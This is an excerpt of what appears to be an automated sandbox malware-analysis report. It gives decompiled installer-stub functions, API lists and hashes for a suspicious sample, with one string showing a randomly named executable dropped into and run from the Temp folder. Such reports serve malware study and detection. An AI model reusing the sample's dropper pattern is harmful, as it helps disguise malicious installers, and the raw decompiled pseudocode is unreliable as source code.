            • Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
            Similarity
            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
            • String ID: A$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl
            • API String ID: 2624150263-3781889236
            • Opcode ID: 1c3e24ea3c91ff4ce813832bee9d1a6c89b271b1ee61e594e0d9cbeb6062d674
            • Instruction ID: 4ef08ca0e285fb36132dd1072a135484aded6f5102cec428142970bb06395e88
            • Opcode Fuzzy Hash: 1c3e24ea3c91ff4ce813832bee9d1a6c89b271b1ee61e594e0d9cbeb6062d674
            • Instruction Fuzzy Hash: 77A182B1901209ABEB11AFA5CD45AEF77B9EF84314F11803BF601B62D1DB7C89418B69
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 67%
            			E004021AA() {
            				signed int _t52;
            				void* _t56;
            				intOrPtr* _t60;
            				intOrPtr _t61;
            				intOrPtr* _t62;
            				intOrPtr* _t64;
            				intOrPtr* _t66;
            				intOrPtr* _t68;
            				intOrPtr* _t70;
            				intOrPtr* _t72;
            				intOrPtr* _t74;
            				intOrPtr* _t76;
            				intOrPtr* _t78;
            				intOrPtr* _t80;
            				void* _t83;
            				intOrPtr* _t91;
            				signed int _t101;
            				signed int _t105;
            				void* _t107;
            
            				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
            				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
            				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
            				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
            				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
            				_t52 =  *(_t107 - 0x20);
            				 *(_t107 - 0x50) = _t52 & 0x00000fff;
            				_t101 = _t52 & 0x00008000;
            				_t105 = _t52 >> 0x0000000c & 0x00000007;
            				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
            				if(E00405FB4( *((intOrPtr*)(_t107 - 0x44))) == 0) {
            					E00402DA6(0x21);
            				}
            				_t56 = _t107 + 8;
            				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
            				if(_t56 < _t83) {
            					L14:
            					 *((intOrPtr*)(_t107 - 4)) = 1;
            					_push(0xfffffff0);
            				} else {
            					_t60 =  *((intOrPtr*)(_t107 + 8));
            					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
            					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
            					if(_t61 >= _t83) {
            						_t64 =  *((intOrPtr*)(_t107 + 8));
            						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
            						if(_t101 == _t83) {
            							_t80 =  *((intOrPtr*)(_t107 + 8));
            							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\jones\\AppData\\Local\\Temp");
            						}
            						if(_t105 != _t83) {
            							_t78 =  *((intOrPtr*)(_t107 + 8));
            							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
            						}
            						_t66 =  *((intOrPtr*)(_t107 + 8));
            						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
            						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
            						if( *_t91 != _t83) {
            							_t76 =  *((intOrPtr*)(_t107 + 8));
            							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
            						}
            						_t68 =  *((intOrPtr*)(_t107 + 8));
            						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
            						_t70 =  *((intOrPtr*)(_t107 + 8));
            						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
            						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
            							_t74 =  *((intOrPtr*)(_t107 - 0x38));
            							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
            						}
            						_t72 =  *((intOrPtr*)(_t107 - 0x38));
            						 *((intOrPtr*)( *_t72 + 8))(_t72);
            					}
            					_t62 =  *((intOrPtr*)(_t107 + 8));
            					 *((intOrPtr*)( *_t62 + 8))(_t62);
            					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
            						_push(0xfffffff4);
            					} else {
            						goto L14;
            					}
            				}
            				E00401423();
            				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t107 - 4));
            				return 0;
            			}






















            0x004021b3
            0x004021bd
            0x004021c7
            0x004021d1
            0x004021dc
            0x004021df
            0x004021f9
            0x004021fc
            0x00402202
            0x00402205
            0x0040220f
            0x00402213
            0x00402213
            0x00402218
            0x00402229
            0x00402231
            0x004022e8
            0x004022e8
            0x004022ef
            0x00402237
            0x00402237
            0x00402246
            0x0040224a
            0x0040224d
            0x00402253
            0x00402261
            0x00402264
            0x00402266
            0x00402271
            0x00402271
            0x00402276
            0x00402278
            0x0040227f
            0x0040227f
            0x00402282
            0x0040228b
            0x0040228e
            0x00402294
            0x00402296
            0x004022a0
            0x004022a0
            0x004022a3
            0x004022ac
            0x004022af
            0x004022b8
            0x004022be
            0x004022c0
            0x004022ce
            0x004022ce
            0x004022d1
            0x004022d7
            0x004022d7
            0x004022da
            0x004022e0
            0x004022e6
            0x004022fb
            0x00000000
            0x00000000
            0x00000000
            0x004022e6
            0x004022f1
            0x00402c2d
            0x00402c39

            APIs
            • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
            Strings
            • C:\Users\user\AppData\Local\Temp, xrefs: 00402269
            Memory Dump Source
            • Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
            Similarity
            • API ID: CreateInstance
            • String ID: C:\Users\user\AppData\Local\Temp
            • API String ID: 542301482-47812868
            • Opcode ID: 95206bf645e1c446277479694b40913283949515a1362953c4f2174f782b348b
            • Instruction ID: c9e7058f2ccac2017f9d88f2873359e197591af4de9cbf84fabb751e216ccc72
            • Opcode Fuzzy Hash: 95206bf645e1c446277479694b40913283949515a1362953c4f2174f782b348b
            • Instruction Fuzzy Hash: A1411571A00209EFCF40DFE4C989E9D7BB5BF49304B2045AAF505EB2D1DB799981CB94
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 39%
            			E0040290B(short __ebx, short* __edi) {
            				void* _t21;
            
            				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
            					E004065B5( *((intOrPtr*)(_t21 - 0xc)), _t8);
            					_push(_t21 - 0x2b0);
            					_push(__edi);
            					E0040666E();
            				} else {
            					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
            					 *__edi = __ebx;
            					 *((intOrPtr*)(_t21 - 4)) = 1;
            				}
            				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t21 - 4));
            				return 0;
            			}




            0x00402923
            0x0040293e
            0x00402949
            0x0040294a
            0x00402a94
            0x00402925
            0x00402928
            0x0040292b
            0x0040292e
            0x0040292e
            0x00402c2d
            0x00402c39

            APIs
            • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
            Memory Dump Source
            • Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
            Similarity
            • API ID: FileFindFirst
            • String ID:
            • API String ID: 1974802433-0
            • Opcode ID: 886e1da82f87bd9a052d385c947725ec3f25a605ee36621127924a1c8a89904e
            • Instruction ID: 9ced82c77f1422a0303d0e50afa4302c42ae01a582b6fde34da312f05d76664a
            • Opcode Fuzzy Hash: 886e1da82f87bd9a052d385c947725ec3f25a605ee36621127924a1c8a89904e
            • Instruction Fuzzy Hash: 5CF05E71904104EAD701DBA4E949AAEB378EF15314F20457BE101F21D0EBB88E119B29
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 96%
            			E00405037(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
            				struct HWND__* _v8;
            				struct HWND__* _v12;
            				long _v16;
            				signed int _v20;
            				signed int _v24;
            				intOrPtr _v28;
            				signed char* _v32;
            				int _v36;
            				signed int _v44;
            				int _v48;
            				signed int* _v60;
            				signed char* _v64;
            				signed int _v68;
            				long _v72;
            				void* _v76;
            				intOrPtr _v80;
            				intOrPtr _v84;
            				void* _v88;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				signed int _t198;
            				intOrPtr _t201;
            				long _t207;
            				signed int _t211;
            				signed int _t222;
            				void* _t225;
            				void* _t226;
            				int _t232;
            				long _t237;
            				long _t238;
            				signed int _t239;
            				signed int _t245;
            				signed int _t247;
            				signed char _t248;
            				signed char _t254;
            				void* _t258;
            				void* _t260;
            				signed char* _t278;
            				signed char _t279;
            				long _t284;
            				struct HWND__* _t291;
            				signed int* _t292;
            				int _t293;
            				long _t294;
            				signed int _t295;
            				void* _t297;
            				long _t298;
            				int _t299;
            				signed int _t300;
            				signed int _t303;
            				signed int _t311;
            				signed char* _t319;
            				int _t324;
            				void* _t326;
            
            				_t291 = _a4;
            				_v12 = GetDlgItem(_t291, 0x3f9);
            				_v8 = GetDlgItem(_t291, 0x408);
            				_t326 = SendMessageW;
            				_v24 =  *0x7a8ac8;
            				_v28 =  *0x7a8ab0 + 0x94;
            				if(_a8 != 0x110) {
            					L23:
            					if(_a8 != 0x405) {
            						_t301 = _a16;
            					} else {
            						_a12 = 0;
            						_t301 = 1;
            						_a8 = 0x40f;
            						_a16 = 1;
            					}
            					if(_a8 == 0x4e || _a8 == 0x413) {
            						_v16 = _t301;
            						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
            							if(( *0x7a8ab9 & 0x00000002) != 0) {
            								L41:
            								if(_v16 != 0) {
            									_t237 = _v16;
            									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
            										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
            									}
            									_t238 = _v16;
            									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
            										_t301 = _v24;
            										_t239 =  *(_t238 + 0x5c);
            										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
            											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
            										} else {
            											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
            										}
            									}
            								}
            								goto L48;
            							}
            							if(_a8 == 0x413) {
            								L33:
            								_t301 = 0 | _a8 != 0x00000413;
            								_t245 = E00404F85(_v8, _a8 != 0x413);
            								_t295 = _t245;
            								if(_t295 >= 0) {
            									_t94 = _v24 + 8; // 0x8
            									_t301 = _t245 * 0x818 + _t94;
            									_t247 =  *_t301;
            									if((_t247 & 0x00000010) == 0) {
            										if((_t247 & 0x00000040) == 0) {
            											_t248 = _t247 ^ 0x00000001;
            										} else {
            											_t254 = _t247 ^ 0x00000080;
            											if(_t254 >= 0) {
            												_t248 = _t254 & 0x000000fe;
            											} else {
            												_t248 = _t254 | 0x00000001;
            											}
            										}
            										 *_t301 = _t248;
            										E0040117D(_t295);
            										_a12 = _t295 + 1;
            										_a16 =  !( *0x7a8ab8) >> 0x00000008 & 0x00000001;
            										_a8 = 0x40f;
            									}
            								}
            								goto L41;
            							}
            							_t301 = _a16;
            							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
            								goto L41;
            							}
            							goto L33;
            						} else {
            							goto L48;
            						}
            					} else {
            						L48:
            						if(_a8 != 0x111) {
            							L56:
            							if(_a8 == 0x200) {
            								SendMessageW(_v8, 0x200, 0, 0);
            							}
            							if(_a8 == 0x40b) {
            								_t225 =  *0x7a1f6c;
            								if(_t225 != 0) {
            									ImageList_Destroy(_t225);
            								}
            								_t226 =  *0x7a1f80;
            								if(_t226 != 0) {
            									GlobalFree(_t226);
            								}
            								 *0x7a1f6c = 0;
            								 *0x7a1f80 = 0;
            								 *0x7a8b00 = 0;
            							}
            							if(_a8 != 0x40f) {
            								L90:
            								if(_a8 == 0x420 && ( *0x7a8ab9 & 0x00000001) != 0) {
            									_t324 = (0 | _a16 == 0x00000020) << 3;
            									ShowWindow(_v8, _t324);
            									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
            								}
            								goto L93;
            							} else {
            								E004011EF(_t301, 0, 0);
            								_t198 = _a12;
            								if(_t198 != 0) {
            									if(_t198 != 0xffffffff) {
            										_t198 = _t198 - 1;
            									}
            									_push(_t198);
            									_push(8);
            									E00405005();
            								}
            								if(_a16 == 0) {
            									L75:
            									E004011EF(_t301, 0, 0);
            									_v36 =  *0x7a1f80;
            									_t201 =  *0x7a8ac8;
            									_v64 = 0xf030;
            									_v24 = 0;
            									if( *0x7a8acc <= 0) {
            										L86:
            										if( *0x7a8b5e == 0x400) {
            											InvalidateRect(_v8, 0, 1);
            										}
            										if( *((intOrPtr*)( *0x7a7a7c + 0x10)) != 0) {
            											E00404F40(0x3ff, 0xfffffffb, E00404F58(5));
            										}
            										goto L90;
            									}
            									_t292 = _t201 + 8;
            									do {
            										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
            										if(_t207 != 0) {
            											_t303 =  *_t292;
            											_v72 = _t207;
            											_v76 = 8;
            											if((_t303 & 0x00000001) != 0) {
            												_v76 = 9;
            												_v60 =  &(_t292[4]);
            												_t292[0] = _t292[0] & 0x000000fe;
            											}
            											if((_t303 & 0x00000040) == 0) {
            												_t211 = (_t303 & 0x00000001) + 1;
            												if((_t303 & 0x00000010) != 0) {
            													_t211 = _t211 + 3;
            												}
            											} else {
            												_t211 = 3;
            											}
            											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
            											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
            											SendMessageW(_v8, 0x113f, 0,  &_v76);
            										}
            										_v24 = _v24 + 1;
            										_t292 =  &(_t292[0x206]);
            									} while (_v24 <  *0x7a8acc);
            									goto L86;
            								} else {
            									_t293 = E004012E2( *0x7a1f80);
            									E00401299(_t293);
            									_t222 = 0;
            									_t301 = 0;
            									if(_t293 <= 0) {
            										L74:
            										SendMessageW(_v12, 0x14e, _t301, 0);
            										_a16 = _t293;
            										_a8 = 0x420;
            										goto L75;
            									} else {
            										goto L71;
            									}
            									do {
            										L71:
            										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
            											_t301 = _t301 + 1;
            										}
            										_t222 = _t222 + 1;
            									} while (_t222 < _t293);
            									goto L74;
            								}
            							}
            						}
            						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
            							goto L93;
            						} else {
            							_t232 = SendMessageW(_v12, 0x147, 0, 0);
            							if(_t232 == 0xffffffff) {
            								goto L93;
            							}
            							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
            							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
            								_t294 = 0x20;
            							}
            							E00401299(_t294);
            							SendMessageW(_a4, 0x420, 0, _t294);
            							_a12 = _a12 | 0xffffffff;
            							_a16 = 0;
            							_a8 = 0x40f;
            							goto L56;
            						}
            					}
            				} else {
            					_v36 = 0;
            					_v20 = 2;
            					 *0x7a8b00 = _t291;
            					 *0x7a1f80 = GlobalAlloc(0x40,  *0x7a8acc << 2);
            					_t258 = LoadImageW( *0x7a8aa0, 0x6e, 0, 0, 0, 0);
            					 *0x7a1f74 =  *0x7a1f74 | 0xffffffff;
            					_t297 = _t258;
            					 *0x7a1f7c = SetWindowLongW(_v8, 0xfffffffc, E00405644);
            					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
            					 *0x7a1f6c = _t260;
            					ImageList_AddMasked(_t260, _t297, 0xff00ff);
            					SendMessageW(_v8, 0x1109, 2,  *0x7a1f6c);
            					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
            						SendMessageW(_v8, 0x111b, 0x10, 0);
            					}
            					DeleteObject(_t297);
            					_t298 = 0;
            					do {
            						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
            						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
            							if(_t298 != 0x20) {
            								_v20 = 0;
            							}
            							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E004066AB(_t298, 0, _t326, 0, _t266)), _t298);
            						}
            						_t298 = _t298 + 1;
            					} while (_t298 < 0x21);
            					_t299 = _a16;
            					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
            					_push(0x15);
            					E004045CA(_a4);
            					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
            					_push(0x16);
            					E004045CA(_a4);
            					_t300 = 0;
            					_v16 = 0;
            					if( *0x7a8acc <= 0) {
            						L19:
            						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
            						goto L20;
            					} else {
            						_t319 = _v24 + 8;
            						_v32 = _t319;
            						do {
            							_t278 =  &(_t319[0x10]);
            							if( *_t278 != 0) {
            								_v64 = _t278;
            								_t279 =  *_t319;
            								_v88 = _v16;
            								_t311 = 0x20;
            								_v84 = 0xffff0002;
            								_v80 = 0xd;
            								_v68 = _t311;
            								_v44 = _t300;
            								_v72 = _t279 & _t311;
            								if((_t279 & 0x00000002) == 0) {
            									if((_t279 & 0x00000004) == 0) {
            										 *( *0x7a1f80 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
            									} else {
            										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
            									}
            								} else {
            									_v80 = 0x4d;
            									_v48 = 1;
            									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
            									_v36 = 1;
            									 *( *0x7a1f80 + _t300 * 4) = _t284;
            									_v16 =  *( *0x7a1f80 + _t300 * 4);
            								}
            							}
            							_t300 = _t300 + 1;
            							_t319 =  &(_v32[0x818]);
            							_v32 = _t319;
            						} while (_t300 <  *0x7a8acc);
            						if(_v36 != 0) {
            							L20:
            							if(_v20 != 0) {
            								E004045FF(_v8);
            								goto L23;
            							} else {
            								ShowWindow(_v12, 5);
            								E004045FF(_v12);
            								L93:
            								return E00404631(_a8, _a12, _a16);
            							}
            						}
            						goto L19;
            					}
            				}
            			}


























































            0x0040503e
            0x00405057
            0x0040505c
            0x00405064
            0x0040506a
            0x00405080
            0x00405083
            0x004052ae
            0x004052b5
            0x004052c9
            0x004052b7
            0x004052b9
            0x004052bc
            0x004052bd
            0x004052c4
            0x004052c4
            0x004052d5
            0x004052e3
            0x004052e6
            0x004052fc
            0x00405371
            0x00405374
            0x00405376
            0x00405380
            0x0040538e
            0x0040538e
            0x00405390
            0x0040539a
            0x004053a0
            0x004053a3
            0x004053a6
            0x004053c1
            0x004053a8
            0x004053b2
            0x004053b2
            0x004053a6
            0x0040539a
            0x00000000
            0x00405374
            0x00405301
            0x0040530c
            0x00405311
            0x00405318
            0x0040531d
            0x00405321
            0x0040532c
            0x0040532c
            0x00405330
            0x00405334
            0x00405338
            0x0040534b
            0x0040533a
            0x0040533a
            0x00405341
            0x00405347
            0x00405343
            0x00405343
            0x00405343
            0x00405341
            0x0040534f
            0x00405351
            0x00405364
            0x00405367
            0x0040536a
            0x0040536a
            0x00405334
            0x00000000
            0x00405321
            0x00405303
            0x0040530a
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x004053c4
            0x004053c4
            0x004053cb
            0x0040543c
            0x00405444
            0x0040544c
            0x0040544c
            0x00405455
            0x00405457
            0x0040545e
            0x00405461
            0x00405461
            0x00405467
            0x0040546e
            0x00405471
            0x00405471
            0x00405477
            0x0040547d
            0x00405483
            0x00405483
            0x00405490
            0x004055f1
            0x004055f8
            0x00405615
            0x0040561b
            0x0040562d
            0x0040562d
            0x00000000
            0x00405496
            0x00405498
            0x0040549d
            0x004054a2
            0x004054a7
            0x004054a9
            0x004054a9
            0x004054aa
            0x004054ab
            0x004054ad
            0x004054ad
            0x004054b5
            0x004054f6
            0x004054f8
            0x00405508
            0x0040550b
            0x00405510
            0x00405517
            0x0040551a
            0x004055bc
            0x004055c5
            0x004055cd
            0x004055cd
            0x004055db
            0x004055ec
            0x004055ec
            0x00000000
            0x004055db
            0x00405520
            0x00405523
            0x00405529
            0x0040552e
            0x00405530
            0x00405532
            0x00405538
            0x0040553f
            0x00405544
            0x0040554b
            0x0040554e
            0x0040554e
            0x00405555
            0x00405561
            0x00405565
            0x00405567
            0x00405567
            0x00405557
            0x00405559
            0x00405559
            0x00405587
            0x00405593
            0x004055a2
            0x004055a2
            0x004055a4
            0x004055a7
            0x004055b0
            0x00000000
            0x004054b7
            0x004054c2
            0x004054c5
            0x004054ca
            0x004054cc
            0x004054d0
            0x004054e0
            0x004054ea
            0x004054ec
            0x004054ef
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x004054d2
            0x004054d2
            0x004054d8
            0x004054da
            0x004054da
            0x004054db
            0x004054dc
            0x00000000
            0x004054d2
            0x004054b5
            0x00405490
            0x004053d3
            0x00000000
            0x004053e9
            0x004053f3
            0x004053f8
            0x00000000
            0x00000000
            0x0040540a
            0x0040540f
            0x0040541b
            0x0040541b
            0x0040541d
            0x0040542c
            0x0040542e
            0x00405432
            0x00405435
            0x00000000
            0x00405435
            0x004053d3
            0x00405089
            0x0040508e
            0x00405097
            0x0040509e
            0x004050b0
            0x004050bb
            0x004050c1
            0x004050cf
            0x004050e3
            0x004050e8
            0x004050f5
            0x004050fa
            0x00405110
            0x00405121
            0x0040512e
            0x0040512e
            0x00405131
            0x00405137
            0x00405139
            0x0040513c
            0x00405141
            0x00405146
            0x00405148
            0x00405148
            0x00405168
            0x00405168
            0x0040516a
            0x0040516b
            0x00405170
            0x00405176
            0x0040517a
            0x0040517f
            0x00405187
            0x0040518b
            0x00405190
            0x00405195
            0x0040519d
            0x004051a0
            0x00405270
            0x00405283
            0x00000000
            0x004051a6
            0x004051a9
            0x004051ac
            0x004051af
            0x004051af
            0x004051b5
            0x004051be
            0x004051c1
            0x004051c5
            0x004051c8
            0x004051cb
            0x004051d4
            0x004051dd
            0x004051e0
            0x004051e3
            0x004051e6
            0x00405224
            0x0040524f
            0x00405226
            0x00405235
            0x00405235
            0x004051e8
            0x004051eb
            0x004051f9
            0x00405203
            0x0040520b
            0x00405212
            0x0040521d
            0x0040521d
            0x004051e6
            0x00405255
            0x00405256
            0x00405262
            0x00405262
            0x0040526e
            0x00405289
            0x0040528c
            0x004052a9
            0x00000000
            0x0040528e
            0x00405293
            0x0040529c
            0x0040562f
            0x00405641
            0x00405641
            0x0040528c
            0x00000000
            0x0040526e
            0x004051a0

            APIs
            • GetDlgItem.USER32 ref: 0040504F
            • GetDlgItem.USER32 ref: 0040505A
            • GlobalAlloc.KERNEL32(00000040,?), ref: 004050A4
            • LoadImageW.USER32 ref: 004050BB
            • SetWindowLongW.USER32(?,000000FC,00405644), ref: 004050D4
            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E8
            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050FA
            • SendMessageW.USER32(?,00001109,00000002), ref: 00405110
            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 0040511C
            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 0040512E
            • DeleteObject.GDI32(00000000), ref: 00405131
            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040515C
            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405168
            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405203
            • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405233
              • Part of subcall function 004045FF: SendMessageW.USER32(00000028,?,00000001,0040442A), ref: 0040460D
            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405247
            • GetWindowLongW.USER32(?,000000F0), ref: 00405275
            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405283
            • ShowWindow.USER32(?,00000005), ref: 00405293
            • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040538E
            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053F3
            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405408
            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 0040542C
            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040544C
            • ImageList_Destroy.COMCTL32(?), ref: 00405461
            • GlobalFree.KERNEL32 ref: 00405471
            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054EA
            • SendMessageW.USER32(?,00001102,?,?), ref: 00405593
            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004055A2
            • InvalidateRect.USER32(?,00000000,00000001), ref: 004055CD
            • ShowWindow.USER32(?,00000000), ref: 0040561B
            • GetDlgItem.USER32 ref: 00405626
            • ShowWindow.USER32(00000000), ref: 0040562D
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
